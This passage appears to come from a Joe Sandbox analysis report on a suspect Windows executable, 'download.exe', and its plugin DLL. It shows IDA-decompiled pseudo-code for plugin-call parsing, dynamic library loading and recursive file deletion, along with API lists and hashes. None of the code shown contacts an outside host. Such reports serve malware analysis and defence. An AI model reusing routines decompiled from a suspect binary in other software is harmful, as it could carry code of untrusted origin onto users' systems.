                                                      										}
                                                      										goto L94;
                                                      									case 0x14:
                                                      										__ebx = 0xffffffff;
                                                      										goto L95;
                                                      									case 0x15:
                                                      										__eax = 0;
                                                      										__eflags = 0;
                                                      										goto L113;
                                                      									case 0x16:
                                                      										__ecx = 0;
                                                      										__eflags = 0;
                                                      										goto L88;
                                                      									case 0x17:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L117;
                                                      									case 0x18:
                                                      										_t261 =  *(_t318 + 0x814);
                                                      										__eflags = _t261 - _v16;
                                                      										if(_t261 > _v16) {
                                                      											_v16 = _t261;
                                                      										}
                                                      										_v8 = _v8 & 0x00000000;
                                                      										_v20 = _v20 & 0x00000000;
                                                      										_v36 - 3 = _t261 - (_v36 == 3);
                                                      										if(_t261 != _v36 == 3) {
                                                      											L82:
                                                      											_v40 = 1;
                                                      										}
                                                      										goto L54;
                                                      									case 0x19:
                                                      										L104:
                                                      										__ecx = 0;
                                                      										_v8 = 2;
                                                      										__ecx = 1;
                                                      										goto L88;
                                                      									case 0x1a:
                                                      										L115:
                                                      										_push(5);
                                                      										goto L120;
                                                      									case 0x1b:
                                                      										L106:
                                                      										__ecx = 0;
                                                      										_v8 = 3;
                                                      										__ecx = 1;
                                                      										goto L88;
                                                      									case 0x1c:
                                                      										L108:
                                                      										__ecx = 0;
                                                      										__ecx = 1;
                                                      										goto L88;
                                                      									case 0x1d:
                                                      										L119:
                                                      										_push(6);
                                                      										goto L120;
                                                      									case 0x1e:
                                                      										L110:
                                                      										_push(2);
                                                      										goto L120;
                                                      									case 0x1f:
                                                      										__eax =  &_v12;
                                                      										__eax = E706B1A36( &_v12);
                                                      										__ebx = __eax;
                                                      										__ebx = __eax + 1;
                                                      										goto L94;
                                                      									case 0x20:
                                                      										L113:
                                                      										_v48 = _v48 + 1;
                                                      										_push(3);
                                                      										_pop(__ecx);
                                                      										goto L88;
                                                      									case 0x21:
                                                      										L117:
                                                      										_push(4);
                                                      										L120:
                                                      										_pop(__ecx);
                                                      										L88:
                                                      										__edi = _v16;
                                                      										__edx =  *(0x706b305c + __ecx * 4);
                                                      										__eax =  ~__eax;
                                                      										asm("sbb eax, eax");
                                                      										_v40 = 1;
                                                      										__edi = _v16 << 5;
                                                      										__eax = __eax & 0x00008000;
                                                      										__edi = (_v16 << 5) + __esi;
                                                      										__eax = __eax | __ecx;
                                                      										__eflags = _v8;
                                                      										 *(__edi + 0x818) = __eax;
                                                      										if(_v8 < 0) {
                                                      											L90:
                                                      											__edx = 0;
                                                      											__edx = 1;
                                                      											__eflags = 1;
                                                      											L91:
                                                      											__eflags = _v8 - 1;
                                                      											 *(__edi + 0x828) = __edx;
                                                      											if(_v8 == 1) {
                                                      												__eax =  &_v12;
                                                      												__eax = E706B1A36( &_v12);
                                                      												__eax = __eax + 1;
                                                      												__eflags = __eax;
                                                      												_v8 = __eax;
                                                      											}
                                                      											__eax = _v8;
                                                      											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                      											_t132 = _v16 + 0x41; // 0x41
                                                      											_t132 = _t132 << 5;
                                                      											__eax = 0;
                                                      											__eflags = 0;
                                                      											 *((intOrPtr*)((_t132 << 5) + __esi)) = 0;
                                                      											 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                      											 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                      											L94:
                                                      											__eflags = __ebx;
                                                      											if(__ebx == 0) {
                                                      												goto L54;
                                                      											}
                                                      											L95:
                                                      											__eflags = _v20;
                                                      											_v40 = 1;
                                                      											if(_v20 != 0) {
                                                      												L100:
                                                      												__eflags = _v20 - 1;
                                                      												if(_v20 == 1) {
                                                      													__eax = _v16;
                                                      													__eax = _v16 << 5;
                                                      													__eflags = __eax;
                                                      													 *(__eax + __esi + 0x82c) = __ebx;
                                                      												}
                                                      												goto L102;
                                                      											}
                                                      											_v16 = _v16 << 5;
                                                      											_t140 = __esi + 0x830; // 0x830
                                                      											__edi = (_v16 << 5) + _t140;
                                                      											__eax =  *__edi;
                                                      											__eflags = __eax - 0xffffffff;
                                                      											if(__eax <= 0xffffffff) {
                                                      												L98:
                                                      												__eax = GlobalFree(__eax);
                                                      												L99:
                                                      												 *__edi = __ebx;
                                                      												goto L100;
                                                      											}
                                                      											__eflags = __eax - 0x19;
                                                      											if(__eax <= 0x19) {
                                                      												goto L99;
                                                      											}
                                                      											goto L98;
                                                      										}
                                                      										__eflags = __edx;
                                                      										if(__edx > 0) {
                                                      											goto L91;
                                                      										}
                                                      										goto L90;
                                                      									case 0x22:
                                                      										goto L54;
                                                      								}
                                                      							}
                                                      							_t262 = _t259 - 1;
                                                      							__eflags = _t262;
                                                      							if(_t262 == 0) {
                                                      								_v16 = _t273;
                                                      								goto L77;
                                                      							}
                                                      							__eflags = _t262 != 1;
                                                      							if(_t262 != 1) {
                                                      								goto L154;
                                                      							}
                                                      							__eflags = _t276 - 0x6e;
                                                      							if(__eflags > 0) {
                                                      								_t297 = _t276 - 0x72;
                                                      								__eflags = _t297;
                                                      								if(_t297 == 0) {
                                                      									_push(4);
                                                      									L71:
                                                      									_pop(_t264);
                                                      									L72:
                                                      									__eflags = _v8 - 1;
                                                      									if(_v8 != 1) {
                                                      										_t92 = _t318 + 0x810;
                                                      										 *_t92 =  *(_t318 + 0x810) &  !_t264;
                                                      										__eflags =  *_t92;
                                                      									} else {
                                                      										 *(_t318 + 0x810) =  *(_t318 + 0x810) | _t264;
                                                      									}
                                                      									_v8 = 1;
                                                      									goto L54;
                                                      								}
                                                      								_t300 = _t297 - 1;
                                                      								__eflags = _t300;
                                                      								if(_t300 == 0) {
                                                      									_push(0x10);
                                                      									goto L71;
                                                      								}
                                                      								__eflags = _t300 != 0;
                                                      								if(_t300 != 0) {
                                                      									goto L54;
                                                      								}
                                                      								_push(0x40);
                                                      								goto L71;
                                                      							}
                                                      							if(__eflags == 0) {
                                                      								_push(8);
                                                      								goto L71;
                                                      							}
                                                      							_t303 = _t276 - 0x21;
                                                      							__eflags = _t303;
                                                      							if(_t303 == 0) {
                                                      								_v8 =  ~_v8;
                                                      								goto L54;
                                                      							}
                                                      							_t304 = _t303 - 0x11;
                                                      							__eflags = _t304;
                                                      							if(_t304 == 0) {
                                                      								_t264 = 0x100;
                                                      								goto L72;
                                                      							}
                                                      							_t305 = _t304 - 0x31;
                                                      							__eflags = _t305;
                                                      							if(_t305 == 0) {
                                                      								_t264 = 1;
                                                      								goto L72;
                                                      							}
                                                      							__eflags = _t305 != 0;
                                                      							if(_t305 != 0) {
                                                      								goto L54;
                                                      							}
                                                      							_push(0x20);
                                                      							goto L71;
                                                      						}
                                                      						goto L15;
                                                      					}
                                                      					_t267 = _t249 - 5;
                                                      					if(_t267 == 0) {
                                                      						__eflags = _v36 - 3;
                                                      						_v32 = 1;
                                                      						_v8 = _t273;
                                                      						_v20 = _t273;
                                                      						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                      						_v40 = _t273;
                                                      						goto L17;
                                                      					}
                                                      					_t271 = _t267 - 1;
                                                      					if(_t271 == 0) {
                                                      						_v32 = 2;
                                                      						_v8 = _t273;
                                                      						_v20 = _t273;
                                                      						goto L17;
                                                      					}
                                                      					if(_t271 != 0x16) {
                                                      						goto L40;
                                                      					} else {
                                                      						_v32 = 3;
                                                      						_v8 = 1;
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      				GlobalFree(_v52);
                                                      				GlobalFree(_v24);
                                                      				GlobalFree(_v44);
                                                      				if(_t318 == _t273 ||  *(_t318 + 0x80c) != _t273) {
                                                      					L174:
                                                      					return _t318;
                                                      				} else {
                                                      					_t216 =  *_t318 - 1;
                                                      					if(_t216 == 0) {
                                                      						_t179 = _t318 + 8; // 0x8
                                                      						_t312 = _t179;
                                                      						__eflags =  *_t312;
                                                      						if( *_t312 != 0) {
                                                      							_t217 = GetModuleHandleA(_t312);
                                                      							__eflags = _t217 - _t273;
                                                      							 *(_t318 + 0x808) = _t217;
                                                      							if(_t217 != _t273) {
                                                      								L163:
                                                      								_t184 = _t318 + 0x408; // 0x408
                                                      								_t313 = _t184;
                                                      								_t218 = E706B15C2( *(_t318 + 0x808), _t313);
                                                      								__eflags = _t218 - _t273;
                                                      								 *(_t318 + 0x80c) = _t218;
                                                      								if(_t218 == _t273) {
                                                      									__eflags =  *_t313 - 0x23;
                                                      									if( *_t313 == 0x23) {
                                                      										_t187 = _t318 + 0x409; // 0x409
                                                      										_t222 = E706B12FE(_t187);
                                                      										__eflags = _t222 - _t273;
                                                      										if(_t222 != _t273) {
                                                      											__eflags = _t222 & 0xffff0000;
                                                      											if((_t222 & 0xffff0000) == 0) {
                                                      												 *(_t318 + 0x80c) = GetProcAddress( *(_t318 + 0x808), _t222 & 0x0000ffff);
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								__eflags = _v48 - _t273;
                                                      								if(_v48 != _t273) {
                                                      									L170:
                                                      									_t313[lstrlenA(_t313)] = 0x41;
                                                      									_t220 = E706B15C2( *(_t318 + 0x808), _t313);
                                                      									__eflags = _t220 - _t273;
                                                      									if(_t220 != _t273) {
                                                      										L158:
                                                      										 *(_t318 + 0x80c) = _t220;
                                                      										goto L174;
                                                      									}
                                                      									__eflags =  *(_t318 + 0x80c) - _t273;
                                                      									L172:
                                                      									if(__eflags != 0) {
                                                      										goto L174;
                                                      									}
                                                      									L173:
                                                      									_t197 = _t318 + 4;
                                                      									 *_t197 =  *(_t318 + 4) | 0xffffffff;
                                                      									__eflags =  *_t197;
                                                      									goto L174;
                                                      								} else {
                                                      									__eflags =  *(_t318 + 0x80c) - _t273;
                                                      									if( *(_t318 + 0x80c) != _t273) {
                                                      										goto L174;
                                                      									}
                                                      									goto L170;
                                                      								}
                                                      							}
                                                      							_t225 = LoadLibraryA(_t312);
                                                      							__eflags = _t225 - _t273;
                                                      							 *(_t318 + 0x808) = _t225;
                                                      							if(_t225 == _t273) {
                                                      								goto L173;
                                                      							}
                                                      							goto L163;
                                                      						}
                                                      						_t180 = _t318 + 0x408; // 0x408
                                                      						_t227 = E706B12FE(_t180);
                                                      						 *(_t318 + 0x80c) = _t227;
                                                      						__eflags = _t227 - _t273;
                                                      						goto L172;
                                                      					}
                                                      					_t228 = _t216 - 1;
                                                      					if(_t228 == 0) {
                                                      						_t177 = _t318 + 0x408; // 0x408
                                                      						_t229 = _t177;
                                                      						__eflags =  *_t229;
                                                      						if( *_t229 == 0) {
                                                      							goto L174;
                                                      						}
                                                      						_t220 = E706B12FE(_t229);
                                                      						L157:
                                                      						goto L158;
                                                      					}
                                                      					if(_t228 != 1) {
                                                      						goto L174;
                                                      					}
                                                      					_t77 = _t318 + 8; // 0x8
                                                      					_t274 = _t77;
                                                      					_t314 = E706B12FE(_t77);
                                                      					 *(_t318 + 0x808) = _t314;
                                                      					if(_t314 == 0) {
                                                      						goto L173;
                                                      					}
                                                      					 *(_t318 + 0x84c) =  *(_t318 + 0x84c) & 0x00000000;
                                                      					 *((intOrPtr*)(_t318 + 0x850)) = E706B1224(_t274);
                                                      					 *(_t318 + 0x83c) =  *(_t318 + 0x83c) & 0x00000000;
                                                      					 *((intOrPtr*)(_t318 + 0x848)) = 1;
                                                      					 *((intOrPtr*)(_t318 + 0x838)) = 1;
                                                      					_t86 = _t318 + 0x408; // 0x408
                                                      					_t220 =  *(_t314->i + E706B12FE(_t86) * 4);
                                                      					goto L157;
                                                      				}
                                                      			}
































































                                                      0x00000000
                                                      0x706b1f22
                                                      0x706b1f22
                                                      0x706b1f24
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f53
                                                      0x706b1f53
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f2d
                                                      0x706b1f2d
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f79
                                                      0x706b1f7d
                                                      0x706b1f82
                                                      0x706b1f85
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f37
                                                      0x706b1f37
                                                      0x706b1f3a
                                                      0x706b1f3c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f4c
                                                      0x706b1f4c
                                                      0x706b1f55
                                                      0x706b1f55
                                                      0x706b1e38
                                                      0x706b1e38
                                                      0x706b1e3b
                                                      0x706b1e42
                                                      0x706b1e44
                                                      0x706b1e46
                                                      0x706b1e4d
                                                      0x706b1e50
                                                      0x706b1e55
                                                      0x706b1e57
                                                      0x706b1e59
                                                      0x706b1e5d
                                                      0x706b1e63
                                                      0x706b1e69
                                                      0x706b1e69
                                                      0x706b1e6b
                                                      0x706b1e6b
                                                      0x706b1e6c
                                                      0x706b1e6c
                                                      0x706b1e70
                                                      0x706b1e76
                                                      0x706b1e78
                                                      0x706b1e7c
                                                      0x706b1e81
                                                      0x706b1e81
                                                      0x706b1e83
                                                      0x706b1e83
                                                      0x706b1e86
                                                      0x706b1e89
                                                      0x706b1e92
                                                      0x706b1e95
                                                      0x706b1e98
                                                      0x706b1e98
                                                      0x706b1e9a
                                                      0x706b1e9d
                                                      0x706b1ea3
                                                      0x706b1ea9
                                                      0x706b1ea9
                                                      0x706b1eab
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1eb1
                                                      0x706b1eb1
                                                      0x706b1eb5
                                                      0x706b1ebc
                                                      0x706b1ee0
                                                      0x706b1ee0
                                                      0x706b1ee4
                                                      0x706b1ee6
                                                      0x706b1ee9
                                                      0x706b1ee9
                                                      0x706b1eec
                                                      0x706b1eec
                                                      0x00000000
                                                      0x706b1ee4
                                                      0x706b1ec1
                                                      0x706b1ec4
                                                      0x706b1ec4
                                                      0x706b1ecb
                                                      0x706b1ecd
                                                      0x706b1ed0
                                                      0x706b1ed7
                                                      0x706b1ed8
                                                      0x706b1ede
                                                      0x706b1ede
                                                      0x00000000
                                                      0x706b1ede
                                                      0x706b1ed2
                                                      0x706b1ed5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ed5
                                                      0x706b1e65
                                                      0x706b1e67
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1dd3
                                                      0x706b1c79
                                                      0x706b1c79
                                                      0x706b1c7a
                                                      0x706b1db9
                                                      0x00000000
                                                      0x706b1db9
                                                      0x706b1c80
                                                      0x706b1c81
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c87
                                                      0x706b1c8a
                                                      0x706b1d7e
                                                      0x706b1d7e
                                                      0x706b1d81
                                                      0x706b1d96
                                                      0x706b1d98
                                                      0x706b1d98
                                                      0x706b1d99
                                                      0x706b1d9c
                                                      0x706b1d9f
                                                      0x706b1dab
                                                      0x706b1dab
                                                      0x706b1dab
                                                      0x706b1da1
                                                      0x706b1da1
                                                      0x706b1da1
                                                      0x706b1db1
                                                      0x00000000
                                                      0x706b1db1
                                                      0x706b1d83
                                                      0x706b1d83
                                                      0x706b1d84
                                                      0x706b1d92
                                                      0x00000000
                                                      0x706b1d92
                                                      0x706b1d87
                                                      0x706b1d88
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d8e
                                                      0x00000000
                                                      0x706b1d8e
                                                      0x706b1c90
                                                      0x706b1d7a
                                                      0x00000000
                                                      0x706b1d7a
                                                      0x706b1c96
                                                      0x706b1c96
                                                      0x706b1c99
                                                      0x706b1cc2
                                                      0x00000000
                                                      0x706b1cc2
                                                      0x706b1c9b
                                                      0x706b1c9b
                                                      0x706b1c9e
                                                      0x706b1cb8
                                                      0x00000000
                                                      0x706b1cb8
                                                      0x706b1ca0
                                                      0x706b1ca0
                                                      0x706b1ca3
                                                      0x706b1cb2
                                                      0x00000000
                                                      0x706b1cb2
                                                      0x706b1ca6
                                                      0x706b1ca7
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ca9
                                                      0x00000000
                                                      0x706b1ca9
                                                      0x00000000
                                                      0x706b1b5b
                                                      0x706b1afe
                                                      0x706b1b01
                                                      0x706b1b30
                                                      0x706b1b34
                                                      0x706b1b3b
                                                      0x706b1b42
                                                      0x706b1b45
                                                      0x706b1b48
                                                      0x00000000
                                                      0x706b1b48
                                                      0x706b1b03
                                                      0x706b1b04
                                                      0x706b1b1f
                                                      0x706b1b26
                                                      0x706b1b29
                                                      0x00000000
                                                      0x706b1b29
                                                      0x706b1b09
                                                      0x00000000
                                                      0x706b1b0f
                                                      0x706b1b0f
                                                      0x706b1b16
                                                      0x00000000
                                                      0x706b1b16
                                                      0x706b1b09
                                                      0x706b1ce7
                                                      0x706b1cec
                                                      0x706b1cf1
                                                      0x706b1cf5
                                                      0x706b2186
                                                      0x706b218c
                                                      0x706b1d07
                                                      0x706b1d09
                                                      0x706b1d0a
                                                      0x706b20b1
                                                      0x706b20b1
                                                      0x706b20b4
                                                      0x706b20b7
                                                      0x706b20d4
                                                      0x706b20da
                                                      0x706b20dc
                                                      0x706b20e2
                                                      0x706b20f9
                                                      0x706b20f9
                                                      0x706b20f9
                                                      0x706b2106
                                                      0x706b210c
                                                      0x706b210f
                                                      0x706b2115
                                                      0x706b2117
                                                      0x706b211a
                                                      0x706b211c
                                                      0x706b2123
                                                      0x706b2128
                                                      0x706b212b
                                                      0x706b212d
                                                      0x706b2132
                                                      0x706b2144
                                                      0x706b2144
                                                      0x706b2132
                                                      0x706b212b
                                                      0x706b211a
                                                      0x706b214a
                                                      0x706b214d
                                                      0x706b2157
                                                      0x706b215f
                                                      0x706b216b
                                                      0x706b2171
                                                      0x706b2174
                                                      0x706b20a6
                                                      0x706b20a6
                                                      0x00000000
                                                      0x706b20a6
                                                      0x706b217a
                                                      0x706b2180
                                                      0x706b2180
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2182
                                                      0x706b2182
                                                      0x706b2182
                                                      0x706b2182
                                                      0x00000000
                                                      0x706b214f
                                                      0x706b214f
                                                      0x706b2155
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2155
                                                      0x706b214d
                                                      0x706b20e5
                                                      0x706b20eb
                                                      0x706b20ed
                                                      0x706b20f3
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b20f3
                                                      0x706b20b9
                                                      0x706b20c0
                                                      0x706b20c6
                                                      0x706b20cc
                                                      0x00000000
                                                      0x706b20cc
                                                      0x706b1d10
                                                      0x706b1d11
                                                      0x706b2090
                                                      0x706b2090
                                                      0x706b2096
                                                      0x706b2099
                                                      0x00000000
                                                      0x00000000
                                                      0x706b20a0
                                                      0x706b20a5
                                                      0x00000000
                                                      0x706b20a5
                                                      0x706b1d18
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d1e
                                                      0x706b1d1e
                                                      0x706b1d27
                                                      0x706b1d2c
                                                      0x706b1d32
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d38
                                                      0x706b1d45
                                                      0x706b1d4b
                                                      0x706b1d55
                                                      0x706b1d5b
                                                      0x706b1d63
                                                      0x706b1d73
                                                      0x00000000
                                                      0x706b1d73

                                                      APIs
                                                        • Part of subcall function 706B1215: GlobalAlloc.KERNEL32(00000040,706B1233,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B121D
                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 706B1BA2
                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 706B1BEA
                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 706B1BF4
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1C07
                                                      • GlobalFree.KERNEL32(?), ref: 706B1CE7
                                                      • GlobalFree.KERNEL32(?), ref: 706B1CEC
                                                      • GlobalFree.KERNEL32(?), ref: 706B1CF1
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1ED8
                                                      • lstrcpyA.KERNEL32(?,?), ref: 706B2061
                                                      • GetModuleHandleA.KERNEL32(00000008), ref: 706B20D4
                                                      • LoadLibraryA.KERNEL32(00000008), ref: 706B20E5
                                                      • GetProcAddress.KERNEL32(?,?), ref: 706B213E
                                                      • lstrlenA.KERNEL32(00000408), ref: 706B2158
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                      • String ID:
                                                      • API String ID: 245916457-0
                                                      • Opcode ID: 4587304b6723f461e924fbc732b1406ddbda198438ef154cdf76fa4ef8df6b7b
                                                      • Instruction ID: c3e5910cb04186ce6f0cd71554026c62044f5b2b7ab08f7ccf57d3e126a83eb1
                                                      • Opcode Fuzzy Hash: 4587304b6723f461e924fbc732b1406ddbda198438ef154cdf76fa4ef8df6b7b
                                                      • Instruction Fuzzy Hash: 8F228EF190424AAEDB119FA4C8A47EEBBFABF05314FB0452ED156AA2C0D77C5A41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E00405745(void* __eflags, signed int _a4, signed int _a8) {
                                                      				signed int _v8;
                                                      				void* _v12;
                                                      				signed int _v16;
                                                      				struct _WIN32_FIND_DATAA _v336;
                                                      				signed int _t40;
                                                      				char* _t53;
                                                      				signed int _t55;
                                                      				signed int _t58;
                                                      				signed int _t64;
                                                      				signed int _t66;
                                                      				void* _t68;
                                                      				signed char _t69;
                                                      				CHAR* _t71;
                                                      				void* _t72;
                                                      				CHAR* _t73;
                                                      				char* _t76;
                                                      
                                                      				_t69 = _a8;
                                                      				_t73 = _a4;
                                                      				_v8 = _t69 & 0x00000004;
                                                      				_t40 = E00405A03(__eflags, _t73);
                                                      				_v16 = _t40;
                                                      				if((_t69 & 0x00000008) != 0) {
                                                      					_t66 = DeleteFileA(_t73); // executed
                                                      					asm("sbb eax, eax");
                                                      					_t68 =  ~_t66 + 1;
                                                      					 *0x7a2fe8 =  *0x7a2fe8 + _t68;
                                                      					return _t68;
                                                      				}
                                                      				_a4 = _t69;
                                                      				_t8 =  &_a4;
                                                      				 *_t8 = _a4 & 0x00000001;
                                                      				__eflags =  *_t8;
                                                      				if( *_t8 == 0) {
                                                      					L5:
                                                      					E00405F7D(0x7a0548, _t73);
                                                      					__eflags = _a4;
                                                      					if(_a4 == 0) {
                                                      						E0040595C(_t73);
                                                      					} else {
                                                      						lstrcatA(0x7a0548, "\*.*");
                                                      					}
                                                      					__eflags =  *_t73;
                                                      					if( *_t73 != 0) {
                                                      						L10:
                                                      						lstrcatA(_t73, 0x40a014);
                                                      						L11:
                                                      						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
                                                      						_t40 = FindFirstFileA(0x7a0548,  &_v336); // executed
                                                      						__eflags = _t40 - 0xffffffff;
                                                      						_v12 = _t40;
                                                      						if(_t40 == 0xffffffff) {
                                                      							L29:
                                                      							__eflags = _a4;
                                                      							if(_a4 != 0) {
                                                      								_t32 = _t71 - 1;
                                                      								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                      								__eflags =  *_t32;
                                                      							}
                                                      							goto L31;
                                                      						} else {
                                                      							goto L12;
                                                      						}
                                                      						do {
                                                      							L12:
                                                      							_t76 =  &(_v336.cFileName);
                                                      							_t53 = E00405940( &(_v336.cFileName), 0x3f);
                                                      							__eflags =  *_t53;
                                                      							if( *_t53 != 0) {
                                                      								__eflags = _v336.cAlternateFileName;
                                                      								if(_v336.cAlternateFileName != 0) {
                                                      									_t76 =  &(_v336.cAlternateFileName);
                                                      								}
                                                      							}
                                                      							__eflags =  *_t76 - 0x2e;
                                                      							if( *_t76 != 0x2e) {
                                                      								L19:
                                                      								E00405F7D(_t71, _t76);
                                                      								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                      								if(__eflags == 0) {
                                                      									_t55 = E004056FD(__eflags, _t73, _v8);
                                                      									__eflags = _t55;
                                                      									if(_t55 != 0) {
                                                      										E004050A4(0xfffffff2, _t73);
                                                      									} else {
                                                      										__eflags = _v8 - _t55;
                                                      										if(_v8 == _t55) {
                                                      											 *0x7a2fe8 =  *0x7a2fe8 + 1;
                                                      										} else {
                                                      											E004050A4(0xfffffff1, _t73);
                                                      											E00405D5C(_t72, _t73, 0);
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                      									if(__eflags == 0) {
                                                      										E00405745(__eflags, _t73, _a8);
                                                      									}
                                                      								}
                                                      								goto L27;
                                                      							}
                                                      							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                      							__eflags = _t64;
                                                      							if(_t64 == 0) {
                                                      								goto L27;
                                                      							}
                                                      							__eflags = _t64 - 0x2e;
                                                      							if(_t64 != 0x2e) {
                                                      								goto L19;
                                                      							}
                                                      							__eflags =  *((char*)(_t76 + 2));
                                                      							if( *((char*)(_t76 + 2)) == 0) {
                                                      								goto L27;
                                                      							}
                                                      							goto L19;
                                                      							L27:
                                                      							_t58 = FindNextFileA(_v12,  &_v336);
                                                      							__eflags = _t58;
                                                      						} while (_t58 != 0);
                                                      						_t40 = FindClose(_v12);
                                                      						goto L29;
                                                      					}
                                                      					__eflags =  *0x7a0548 - 0x5c;
                                                      					if( *0x7a0548 != 0x5c) {
                                                      						goto L11;
                                                      					}
                                                      					goto L10;
                                                      				} else {
                                                      					__eflags = _t40;
                                                      					if(_t40 == 0) {
                                                      						L31:
                                                      						__eflags = _a4;
                                                      						if(_a4 == 0) {
                                                      							L39:
                                                      							return _t40;
                                                      						}
                                                      						__eflags = _v16;
                                                      						if(_v16 != 0) {
                                                      							_t40 = E00406280(_t73);
                                                      							__eflags = _t40;
                                                      							if(_t40 == 0) {
                                                      								goto L39;
                                                      							}
                                                      							E00405915(_t73);
                                                      							_t40 = E004056FD(__eflags, _t73, _v8 | 0x00000001);
                                                      							__eflags = _t40;
                                                      							if(_t40 != 0) {
                                                      								return E004050A4(0xffffffe5, _t73);
                                                      							}
                                                      							__eflags = _v8;
                                                      							if(_v8 == 0) {
                                                      								goto L33;
                                                      							}
                                                      							E004050A4(0xfffffff1, _t73);
                                                      							return E00405D5C(_t72, _t73, 0);
                                                      						}
                                                      						L33:
                                                      						 *0x7a2fe8 =  *0x7a2fe8 + 1;
                                                      						return _t40;
                                                      					}
                                                      					__eflags = _t69 & 0x00000002;
                                                      					if((_t69 & 0x00000002) == 0) {
                                                      						goto L31;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      			}




















                                                      APIs
                                                      • DeleteFileA.KERNELBASE(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040576E
                                                      • lstrcatA.KERNEL32(Forgngeliges.rea,\*.*,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057B6
                                                      • lstrcatA.KERNEL32(?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D7
                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DD
                                                      • FindFirstFileA.KERNELBASE(Forgngeliges.rea,?,?,?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057EE
                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040589B
                                                      • FindClose.KERNEL32(00000000), ref: 004058AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$C:\Users\user\AppData\Local\Temp\$Forgngeliges.rea$\*.*
                                                      • API String ID: 2035342205-3789463636
                                                      • Opcode ID: 7ffff7cd34069f0b96449660ed6e7fefb86e4840da2f9e0b27970072ed7274d0
                                                      • Instruction ID: 8fe5727fece67214ca9e537269006626f4bb6c92c430407bbf8d6e8d58a7b1f2
                                                      • Opcode Fuzzy Hash: 7ffff7cd34069f0b96449660ed6e7fefb86e4840da2f9e0b27970072ed7274d0
                                                      • Instruction Fuzzy Hash: 6A51C131800A09AADF217B218C85BBF7A78DF42714F14817FF855B51D2D73C8952DE69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E004020D1() {
                                                      				signed int _t55;
                                                      				void* _t59;
                                                      				intOrPtr* _t63;
                                                      				intOrPtr _t64;
                                                      				intOrPtr* _t65;
                                                      				intOrPtr* _t67;
                                                      				intOrPtr* _t69;
                                                      				intOrPtr* _t71;
                                                      				intOrPtr* _t73;
                                                      				intOrPtr* _t75;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr* _t80;
                                                      				intOrPtr* _t82;
                                                      				intOrPtr* _t84;
                                                      				int _t87;
                                                      				intOrPtr* _t95;
                                                      				signed int _t105;
                                                      				signed int _t109;
                                                      				void* _t111;
                                                      
                                                      				 *(_t111 - 0x3c) = E00402ACB(0xfffffff0);
                                                      				 *(_t111 - 0xc) = E00402ACB(0xffffffdf);
                                                      				 *((intOrPtr*)(_t111 - 0x80)) = E00402ACB(2);
